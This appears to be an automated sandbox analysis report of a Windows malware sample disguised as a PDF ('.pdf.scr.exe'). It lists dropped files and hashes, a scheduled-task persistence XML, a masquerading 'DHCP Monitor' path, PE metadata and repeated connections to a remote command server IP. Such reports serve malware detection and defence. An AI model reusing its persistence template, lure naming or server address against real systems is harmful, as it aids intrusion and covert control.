              SHA-256:A3FB7C9084245E0939340B7ABBFA54C7AE7367CCF3D5E134EAA847E1EA453AEC
              SHA-512:A7F912456131E21627C14DADD6DF84AA9642006191D60A7E0B486B3850B8B0B63F87C559C5257344C98917501289782DFFC9347670B265C908CFDAEB0CDCCAE4
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):501
              Entropy (8bit):6.190656898709683
              Encrypted:false
              SSDEEP:
              MD5:4171BED3F16A92882815F61417AB975A
              SHA1:97A4483C79036BE8148C6169C7CCFF080742F40C
              SHA-256:E5F2CF9586AA8F0634FEE2474D46BCF6030846F0B4A02FED80F65700FCA8F0F8
              SHA-512:59566FBFDF44FE734293BF1E1DC1FAC5A63D4458E858EA05B602F56613257F99DEEBB4C7D961169A01C774DAC87A1BA35C020B7FB9FF327970E60973661A109C
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):514
              Entropy (8bit):6.214291435583763
              Encrypted:false
              SSDEEP:
              MD5:55F643ECFE99B550B4823D0DB2E473C1
              SHA1:1DE1E7E890127FBCE7DCC4283B1F0ED2073071B8
              SHA-256:3283E76A48819F103CA6F2E58AB9911EF46DA4A6438E9CD37FD0628E0F664E17
              SHA-512:02B7C643A796B8B88CA0E3EE20024E15F13E0BB25B1A08F331408D0405EE39A478728365D61FC722356F73058050FD2230C28600076A8DCFCADEAC9BE1066863
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):572
              Entropy (8bit):6.170181324269657
              Encrypted:false
              SSDEEP:
              MD5:42788E9A82626033D1C890FEC1616027
              SHA1:4BC3D32071130B8830BA6999CAB6E836AFA741A6
              SHA-256:60B95B214023625539B917062F51833E9923711321185E7702ECCF0F9E16B256
              SHA-512:0334DB3EDE8EA3CB5107527EE5F162EFA37CE7C4CDBB168361614A6300443C0BDCF03590340C0E985882DA20C66717CC585F8621758AA81A9953BA04BA7ACCFB
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):583
              Entropy (8bit):6.261328591888464
              Encrypted:false
              SSDEEP:
              MD5:E5450ED1310BAA27DF96331533B7116A
              SHA1:8F6F7C76A308B213EF39DE070CD3DF23B90EC209
              SHA-256:B5A1C32F1B74BD9BC40CB515B88DD0B1C0FB449DABC9E93AC75C581F111EEFB3
              SHA-512:519BE0EAFDBCD915E4C404F11DA4A713364BDF2EB4A2ADAD0E0CC16E3B0AA634C5AD0A5F498CCE8E3193365BDE1635154F054B4D54E4BF47EA6ACBA6F041A459
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):753
              Entropy (8bit):6.265094025870397
              Encrypted:false
              SSDEEP:
              MD5:61F20CA5A3C48D6323D19BEB700DE2F4
              SHA1:FEC46018E797396868619396016CC00F3E9F0D7D
              SHA-256:8637DDC34CC6276D56738F219D8AD4EB4BBF73D80CEE16AA0C686B96E49031A2
              SHA-512:AD6CABC216D4F5212FC3AA7EDAD6289E6CBE4C6E7336E804083D0E8AB390F6554E088B735761A6F3E1D7D9F93737EA0D2E32FB02B7ECD787EF6F5BDC4984044A
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):530
              Entropy (8bit):6.201022804655084
              Encrypted:false
              SSDEEP:
              MD5:3D1A20AE25ACA76918F525813753BB90
              SHA1:40EF954835A5E919E13155803E422FCB59A4D6E7
              SHA-256:72B7AA6124893C2A087D1691D2C7AD052903E028BEE451F5350C7BFFA2C50AD5
              SHA-512:706116CECE24D60C06B4691FF94B01BB7811165D6003CD7829CD32C9F791DEB2FC30753E9FEE794A1947CB422BCA69E7A5E6C90C8BCC07FA7598C579D185ADD3
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):510
              Entropy (8bit):6.227023728555456
              Encrypted:false
              SSDEEP:
              MD5:BF8C92BF8491E4783B72B4CCDA5E91BB
              SHA1:7D3E0FE500A79523FCB5C9E636E3B399C0FD8CA9
              SHA-256:B7FDCD17F59F82AD25996F0D1DB018624A51022D94780493A4AB98047C2EA7A3
              SHA-512:42092933F616ED495EE9D2DB9C5C40C34DA55DFE9E9A74A832DED06106EE0BF142AE220780BE2E820C97878A6B88BAFF450B66C89966D02F73F659974BD7A3BF
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):34981
              Entropy (8bit):5.585572477462829
              Encrypted:false
              SSDEEP:
              MD5:923021E60F76E22DF3997015A75D2DE2
              SHA1:0BF1F4312CB742E0FD3AA4797CD68839DD50EB86
              SHA-256:AC7EB1744189B9B145C3056E7847B5C17F27ED32BB66E05C5B7AE5CA024866B3
              SHA-512:C9E2B8BD11CF6DC78AF257148ABF0E0126FFE55130E6A80F63DEB33FA320B7048C6AFADDFEB692BD5D747D47D0EAD7EB45B203E62BB4F085567AB7E3E503200B
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):572
              Entropy (8bit):6.245277588351939
              Encrypted:false
              SSDEEP:
              MD5:6A372892797F0436A2022B5C0D051DDF
              SHA1:D2138DA84C4D4469393DAF6B309C699D3776835B
              SHA-256:7E732B89FD4BA6996C2FEFB7DB6DA5BDE6B85E6BC44F7EA21DAA62992AE6A61A
              SHA-512:F25D9D07788FCB898C9174F06CFD76FC86F5CDD1202463BFA431CD7DCF72BD4B3616D3EF6F1B373898E551B515771F2A8DF8ED7E199982B0BC89AB06C0C40151
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):704
              Entropy (8bit):6.242209133425222
              Encrypted:false
              SSDEEP:
              MD5:30766DEDBDECAFF845571EEA5F3B21E4
              SHA1:514644B945925EEEE525AF9A8737277954B89288
              SHA-256:084034C5553C3DC615FA87DD84E10679480C16460B6A7F2EF3C5D8B0943683DD
              SHA-512:9CA41F1331CDBDE97DFFE697D3500117AB4DB8D19A12A900910CF8AF0526CEF5311295E10B3464FAA1451B3F6C8E445B8C48360FDDF239DAEF5E4651B76D6E60
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:modified
              Size (bytes):45152
              Entropy (8bit):6.149629800481177
              Encrypted:false
              SSDEEP:
              MD5:2867A3817C9245F7CF518524DFD18F28
              SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
              SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
              Malicious:true
              Reputation:unknown
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1311
              Entropy (8bit):5.120237537969728
              Encrypted:false
              SSDEEP:
              MD5:9CC9B31561289BF47DDBEF114BE4B6FA
              SHA1:C901987D5F8BBAD7231B7EE4A65ADB93BB0F56A5
              SHA-256:984AA44429B06B17C290376A8D741A2DAE62FE6F38EEBBF434A0781230686097
              SHA-512:075F148FDD9187FDD6BA56D1CD3D81641FE8D8F9FBA903F98B307463B4BCDC77556B542CFD73C9BC2C34D364245D5B8080DE69DC968DE9070D44FE180741D4FC
              Malicious:true
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1310
              Entropy (8bit):5.109425792877704
              Encrypted:false
              SSDEEP:
              MD5:5C2F41CFC6F988C859DA7D727AC2B62A
              SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
              SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
              SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:data
              Category:dropped
              Size (bytes):8
              Entropy (8bit):3.0
              Encrypted:false
              SSDEEP:
              MD5:51BBBB873C030E460FAD17FEDABBC3AB
              SHA1:5CC4E4B44A56143A4634286AA9E05F8607426C06
              SHA-256:AF3FBBF96097D55438E4F0F623AB560923B3E01927AC132EEA4D194DF8D96F42
              SHA-512:FAB50F156C07AF56AD56024C5E3E9443F1E31A524EAE3EA50BA699AC7CDEF7EE8BA65219E2A10F24F42D025C1080787F847CDE081FD21D10649D86B89516AB8B
              Malicious:true
              Reputation:unknown
              Preview:Y.;hR..H
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):48
              Entropy (8bit):4.556127542695029
              Encrypted:false
              SSDEEP:
              MD5:71C86F4534ED6EA4C1E9A785F2EB0A92
              SHA1:D065F0540580FC2E0ACD365784FD5A60F8235829
              SHA-256:DBC475B81DC4AACF70235516B8FB463D4FB170C3E72E647C0BA2A30D3B9EC4E3
              SHA-512:6D97D624C0A2B3D3B8D51A4F2502B8874E59E29538AD0477F1DE32FEEDAE38890F68532B591EEF0FA0DB23CD4929890DB256ACB8E4B73F6F790BB11C13473688
              Malicious:false
              Reputation:unknown
              Preview:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Process:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):91
              Entropy (8bit):5.006199003780079
              Encrypted:false
              SSDEEP:
              MD5:AEF559A1D83E37D78B012A94CCE85889
              SHA1:44228F31FBDA6D787CD91E082E8EF769A23B37AA
              SHA-256:637F2CAB19C58F9E961062E379089A4DCDDCA806EA439BC8C0E63285DEC9F294
              SHA-512:235B7E78EBFFC6640E9476A85C3FD528A4C420F62DCA2AD7FA8C8105669B3278DEDBD50E51B73A7344775C7B9C076594DFDC91FD3857875278066039B91D9A9C
              Malicious:false
              Reputation:unknown
              Preview:[S3tt!ng]..stpth=%localappdata%\temp..Key=Chrome..Dir3ctory=Folder10_51..ExE_c=ihgsvw.exe..
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1141
              Entropy (8bit):4.44831826838854
              Encrypted:false
              SSDEEP:
              MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
              SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
              SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
              SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
              Malicious:false
              Reputation:unknown
              Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.853911292117169
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:004349256789197.pdf.scr.exe
              File size:1181640
              MD5:3ac05bbe35293fbfd0df49ecfb34c461
              SHA1:ee12d93ac5f81036e920bb8c05638aa4e6c1f3bf
              SHA256:576263fb3c88934ebdb0aa6071f3a980710c9dfd2a3d63d09b0aa76f1caac9e7
              SHA512:21f616118075066eda343383aad8d6f2dd71bc33c9b8efec3eedc891414d96a0602449abddb96513d55da97ddedb987d612d8227dfd8f64ca85ed2051eb02e14
              SSDEEP:24576:9TbBv5rUeTM/TYaxVKPijgGjFwJ5gRn0Bz76hZYBA3pUd26P207:XBvsHB7jQ5Cnq7+ZEA3pEt+0
              TLSH:AD451202BBC695B3D5A3193256753B11BA3CB9601FA58ECFA7E00A5CDA315C0DB317B2
              Icon Hash:938c8c90b2ea6ab2
              Entrypoint:0x41f530
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:12e12319f1029ec4f8fcbed7e82df162
              Instruction
              call 00007F216C70BF2Bh
              jmp 00007F216C70B83Dh
              int3
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F216C6FE687h
              mov dword ptr [esi], 004356D0h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 004356D8h
              mov dword ptr [ecx], 004356D0h
              ret
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              mov esi, ecx
              lea eax, dword ptr [esi+04h]
              mov dword ptr [esi], 004356B8h
              push eax
              call 00007F216C70ECCFh
              test byte ptr [ebp+08h], 00000001h
              pop ecx
              je 00007F216C70B9CCh
              push 0000000Ch
              push esi
              call 00007F216C70AF89h
              pop ecx
              pop ecx
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F216C6FE602h
              push 0043BEF0h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F216C70E789h
              int3
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F216C70B948h
              push 0043C0F4h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F216C70E76Ch
              int3
              jmp 00007F216C710207h
              int3
              int3
              int3
              int3
              push 00422900h
              push dword ptr fs:[00000000h]
              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x4a8c | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x69000 | 0x233c | .reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x1000 | 0x31bdc | 0x31c00 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata | 0x33000 | 0xaec0 | 0xb000 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data | 0x3e000 | 0x24720 | 0x1000 | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .didat | 0x63000 | 0x190 | 0x200 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc | 0x64000 | 0x4a8c | 0x4c00 | False | 0.6105571546052632 | data | 6.391160230365552 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc | 0x69000 | 0x233c | 0x2400 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              Name | RVA | Size | Type | Language | Country
              PNG | 0x64524 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States
              PNG | 0x6506c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States
              RT_ICON | 0x66618 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | |
              RT_DIALOG | 0x66740 | 0x286 | data | English | United States
              RT_DIALOG | 0x669c8 | 0x13a | data | English | United States
              RT_DIALOG | 0x66b04 | 0xec | data | English | United States
              RT_DIALOG | 0x66bf0 | 0x12e | data | English | United States
              RT_DIALOG | 0x66d20 | 0x338 | data | English | United States
              RT_DIALOG | 0x67058 | 0x252 | data | English | United States
              RT_STRING | 0x672ac | 0x1e2 | data | English | United States
              RT_STRING | 0x67490 | 0x1cc | data | English | United States
              RT_STRING | 0x6765c | 0x1b8 | data | English | United States
              RT_STRING | 0x67814 | 0x146 | data | English | United States
              RT_STRING | 0x6795c | 0x46c | data | English | United States
              RT_STRING | 0x67dc8 | 0x166 | data | English | United States
              RT_STRING | 0x67f30 | 0x152 | data | English | United States
              RT_STRING | 0x68084 | 0x10a | data | English | United States
              RT_STRING | 0x68190 | 0xbc | data | English | United States
              RT_STRING | 0x6824c | 0xd6 | data | English | United States
              RT_GROUP_ICON | 0x68324 | 0x14 | data | |
              RT_MANIFEST | 0x68338 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
              DLL | Import
              KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
              OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
              gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
              Language of compilation system | Country where language is spoken | Map
              English | United States |
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Feb 3, 2023 17:52:09.616486073 CET | 49714 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:10.228163958 CET | 60705 | 49714 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:10.918013096 CET | 49714 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:11.253858089 CET | 60705 | 49714 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:11.918045998 CET | 49714 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:12.473380089 CET | 60705 | 49714 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:16.750894070 CET | 49717 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:17.593020916 CET | 60705 | 49717 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:18.106157064 CET | 49717 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:18.553436995 CET | 60705 | 49717 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:19.215564966 CET | 49717 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:20.013190031 CET | 60705 | 49717 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:25.434919119 CET | 49719 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:25.738920927 CET | 60705 | 49719 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:26.325540066 CET | 49719 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:26.978645086 CET | 60705 | 49719 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:27.521703959 CET | 49719 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:28.055362940 CET | 60705 | 49719 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:32.305283070 CET | 49721 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:32.739506006 CET | 60705 | 49721 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:33.393497944 CET | 49721 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:33.869709015 CET | 60705 | 49721 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:34.419946909 CET | 49721 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:34.984946966 CET | 60705 | 49721 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:39.125330925 CET | 49723 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:39.763123989 CET | 60705 | 49723 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:40.264465094 CET | 49723 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:41.218107939 CET | 60705 | 49723 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:41.733109951 CET | 49723 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:42.393220901 CET | 60705 | 49723 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:46.811115026 CET | 49724 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:47.348661900 CET | 60705 | 49724 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:48.015109062 CET | 49724 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:48.524660110 CET | 60705 | 49724 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:49.124406099 CET | 49724 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:49.670073032 CET | 60705 | 49724 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:53.803543091 CET | 49726 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:54.358467102 CET | 60705 | 49726 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:54.921699047 CET | 49726 | 60705 | 192.168.2.7 | 212.193.30.230
